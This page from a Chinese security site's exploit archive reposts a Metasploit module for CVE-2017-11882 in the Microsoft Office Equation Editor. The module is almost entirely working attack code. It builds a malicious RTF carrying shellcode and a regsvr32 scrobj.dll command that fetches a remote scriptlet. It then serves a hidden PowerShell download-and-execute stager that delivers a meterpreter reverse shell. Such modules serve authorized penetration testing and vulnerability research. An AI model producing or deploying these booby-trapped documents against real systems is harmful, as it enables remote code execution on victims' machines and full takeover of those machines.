首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Office Equation Editor Code Execution
来源:metasploit.com 作者:mumbai 发布时间:2017-12-06  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::FILEFORMAT


  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Microsoft Office CVE-2017-11882',
      'Description' => %q{
        Module exploits a flaw in how the Equation Editor that
        allows an attacker to execute arbitrary code in RTF files without
        interaction. The vulnerability is caused by the Equation Editor,
        to which fails to properly handle OLE objects in memory.
      },
      'Author' => ['mumbai', 'embedi'],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Nov 15 2017',
      'References' => [
        ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
        ['URL', 'https://github.com/embedi/CVE-2017-11882']
      ],
      'Platform' => 'win',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' => [
        ['Microsoft Office', {} ],
      ],
      'DefaultTarget' => 0,
      'Payload' => {
        'DisableNops' => true
      },
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
        'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
      }
    ))

    register_options([
        OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
        OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
    ])
  end

  def retrieve_header(filename)
    if (not datastore['FOLDER_PATH'].nil?)
      path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}"
    else
      path = nil
    end
    if (not path.nil?)
      if ::File.file?(path)
        File.open(path, 'rb') do |fd|
          header = fd.read(fd.stat.size).split('{\*\datastore').first
          header = header.to_s # otherwise I get nil class...
          print_status("Injecting #{path}...")
          return header
        end
      else
        header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
        header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
        header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
      end
    else
      header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
      header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
      header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
    end
    return header
  end



  def generate_rtf
    header = retrieve_header(datastore['FILENAME'])
    object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
    object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
    object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
    object_class << '09000600000000000000000000000100000001000000000000000010000002000'
    object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
    object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
    object_class << '07400720079000000000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
    object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
    object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000003'
    object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
    object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
    object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
    object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
    object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
    object_class << '00000000000000000000000000000000000000000000000000000000000000000'
    object_class << "00000300040000000000000000000000000000000000000000000000000000000"
    object_class << "000000000000000000000000000000000000000000000000000000000000000\n"


    shellcode = "\x1c\x00"                  #  0:   1c 00                   sbb    al,0x0
    shellcode << "\x00\x00"                 #  2:   00 00                   add    BYTE PTR [eax],al
    shellcode << "\x02\x00"                 #  4:   02 00                   add    al,BYTE PTR [eax]
    shellcode << "\x9e"                     #  6:   9e                      sahf
    shellcode << "\xc4\xa9\x00\x00\x00\x00" #  7:   c4 a9 00 00 00 00       les    ebp,FWORD PTR [ecx+0x0]
    shellcode << "\x00\x00"                 #  d:   00 00                   add    BYTE PTR [eax],al
    shellcode << "\x00\xc8"                 #  f:   00 c8                   add    al,cl
    shellcode << "\xa7"                     # 11:   a7                      cmps   DWORD PTR ds:[esi],DWORD PTR es:[edi]
    shellcode << "\\"                       # 12:   5c                      pop    esp
    shellcode << "\x00\xc4"                 # 13:   00 c4                   add    ah,al
    shellcode << "\xee"                     # 15:   ee                      out    dx,al
    shellcode << "["                        # 16:   5b                      pop    ebx
    shellcode << "\x00\x00"                 # 17:   00 00                   add    BYTE PTR [eax],al
    shellcode << "\x00\x00"                 # 19:   00 00                   add    BYTE PTR [eax],al
    shellcode << "\x00\x03"                 # 1b:   00 03                   add    BYTE PTR [ebx],al
    shellcode << "\x01\x01"                 # 1d:   01 01                   add    DWORD PTR [ecx],eax
    shellcode << "\x03\n"                   # 1f:   03 0a                   add    ecx,DWORD PTR [edx]
    shellcode << "\n\x01"                   # 21:   0a 01                   or     al,BYTE PTR [ecx]
    shellcode << "\x08ZZ"                   # 23:   08 5a 5a                or     BYTE PTR [edx+0x5a],bl
    shellcode << "\xB8\x44\xEB\x71\x12"     # 26:   b8 44 eb 71 12          mov    eax,0x1271eb44
    shellcode << "\xBA\x78\x56\x34\x12"     # 2b:   ba 78 56 34 12          mov    edx,0x12345678
    shellcode << "\x31\xD0"                 # 30:   31 d0                   xor    eax,edx
    shellcode << "\x8B\x08"                 # 32:   8b 08                   mov    ecx,DWORD PTR [eax]
    shellcode << "\x8B\x09"                 # 34:   8b 09                   mov    ecx,DWORD PTR [ecx]
    shellcode << "\x8B\x09"                 # 36:   8b 09                   mov    ecx,DWORD PTR [ecx]
    shellcode << "\x66\x83\xC1\x3C"         # 38:   66 83 c1 3c             add    cx,0x3c
    shellcode << "\x31\xDB"                 # 3c:   31 db                   xor    ebx,ebx
    shellcode << "\x53"                     # 3e:   53                      push   ebx
    shellcode << "\x51"                     # 3f:   51                      push   ecx
    shellcode << "\xBE\x64\x3E\x72\x12"     # 40:   be 64 3e 72 12          mov    esi,0x12723e64
    shellcode << "\x31\xD6"                 # 45:   31 d6                   xor    esi,edx
    shellcode << "\xFF\x16"                 # 47:   ff 16                   call   DWORD PTR [esi]
    shellcode << "\x53"                     # 49:   53                      push   ebx
    shellcode << "\x66\x83\xEE\x4C"         # 4a:   66 83 ee 4c             sub    si,0x4c
    shellcode << "\xFF\x10"                 # 4e:   ff 10                   call   DWORD PTR [eax]
    shellcode << "\x90"                     # 50:   90                      nop
    shellcode << "\x90"                     # 50:   90                      nop

    footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
    footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
    footer << '00000000000000000000000000000000000000000000000000000'
    footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000400'
    footer << '0000C5000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'
    footer << '000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000000000'
    footer << '000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'
    footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
    footer << '00000000000000000000000000000000000000000000000000000000000000000'
    footer << '00000000000000001050000050000000D0000004D45544146494C'
    footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'
    footer << '500000002001C0000000000050000000902000000000500000002'
    footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'
    footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'
    footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'
    footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'
    footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'
    footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'
    footer << '00030000000000' + "\n"
    footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n"
    footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n"
    footer << "0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n"
    footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n"
    footer << "0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n"
    footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n"
    footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n"
    footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n"
    footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n"
    footer << "00000000\n"
    footer << "}}}\n"
    footer << '\par}' + "\n"


    payload = shellcode
    payload += [0x00402114].pack("V")
    payload += "\x00" * 2
    payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
    payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
    payload = header + object_class + payload + footer
    payload
  end



  def gen_psh(url, *method)
    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl

    if method.include? 'string'
      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
    else
      # Random filename to use, if there isn't anything set
      random = "#{rand_text_alphanumeric 8}.exe"
      # Set filename (Use random filename if empty)
      filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']

      # Set path (Use %TEMP% if empty)
      path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')

      # Join Path and Filename
      file = %Q(echo (#{path}+'\\#{filename}'))

      # Generate download PowerShell command
      download_string = Rex::Powershell::PshMethods.download_run(url, file)
    end

    download_and_run = "#{ignore_cert}#{download_string}"

    # Generate main PowerShell command
    return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
  end

  def on_request_uri(cli, _request)
    if _request.raw_uri =~ /\.sct$/
      print_status("Handling request for .sct from #{cli.peerhost}")
      payload = gen_psh("#{get_uri}", "string")
      data = gen_sct_file(payload)
      send_response(cli, data, 'Content-Type' => 'text/plain')
    else
      print_status("Delivering payload to #{cli.peerhost}...")
      p = regenerate_payload(cli)
      data = cmd_psh_payload(p.encoded,
                       payload_instance.arch.first,
                       remove_comspec: true,
                       exec_in_place: true
      )
      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
    end
  end


  def rand_class_id
    "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
  end


  def gen_sct_file(command)
    # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).
    if command == ''
      return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"></registration></scriptlet>}
    # If a command is provided, tell the target system to execute it.
    else
      return %{<?XML version="1.0"?><scriptlet><registration progid="#{Rex::Text.rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
    end
  end


  def primer
    file_create(generate_rtf)
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Claymore's Dual Miner 10.1 Sta
·Polycom Shell HDX Series Trace
·Proxifier for Mac 2.19 - Local
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Sera 1.2 - Local root Privileg
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Arq 5.9.6 - Local root Privile
·Murus 1.4.11 - Local root Priv
·Arq 5.9.7 - Local root Privile
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved